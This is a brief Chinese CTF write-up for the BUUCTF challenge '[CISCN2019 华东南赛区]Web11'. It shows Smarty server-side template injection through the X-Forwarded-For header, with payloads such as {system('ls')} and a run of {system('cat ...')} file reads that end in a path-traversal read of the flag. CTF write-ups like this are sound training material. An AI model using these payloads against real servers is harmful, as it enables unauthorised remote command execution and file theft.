BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入

BUUCTF之[CISCN2019 华东南赛区]Web11

知识点

• SSTI
• smarty
• X-Forwarded-For

题目

于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1

emmmmmm其实一开始添加完这个就不知道怎么做了，后来去看了别人的WP有提示SSTI和smarty这两个词。心想，这个不是最近才做过类似的题目嘛。。。哎！我居然没想到！
所以开始尝试一下：X-Forwarded-For:{7*8}

获取当前目录有那些文件：X-Forwarded-For:{system('ls')}

读取某个文件比如：X-Forwarded-For:{system('cat /api')}。但是我试了以下的所有文件都没找到flag

• X-Forwarded-For:{system(‘cat /api’)}
• X-Forwarded-For:{system(‘cat /css’)}
• X-Forwarded-For:{system(‘cat /index.php’)}
• X-Forwarded-For:{system(‘cat /smarty’)}
• X-Forwarded-For:{system(‘cat /templates_c’)}
• X-Forwarded-For:{system(‘cat /xff’)}
• X-Forwarded-For:{system(‘cat /flag’)}
• X-Forwarded-For:{system(‘cat /flag.php’)}

所以猜测flag可能是在根目录下，所以X-Forwarded-For:{system('cat ../../../../../../../../flag')}

这样就可以获取到flag啦！！！